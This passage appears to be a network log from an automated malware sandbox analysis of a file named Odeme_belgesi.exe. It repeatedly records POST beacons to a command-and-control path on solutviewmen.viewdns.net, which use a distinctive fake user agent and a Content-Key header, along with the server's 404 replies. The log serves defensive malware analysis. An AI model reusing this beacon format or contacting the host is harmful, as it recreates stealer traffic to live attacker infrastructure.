Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Code function: 1_2_00404ED4 recv,

1_2_00404ED4

Source: global traffic

DNS traffic detected: DNS query: solutviewmen.viewdns.net

Source: unknown

HTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:36 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:38 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:45 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:57 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:25:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:45 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:45 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
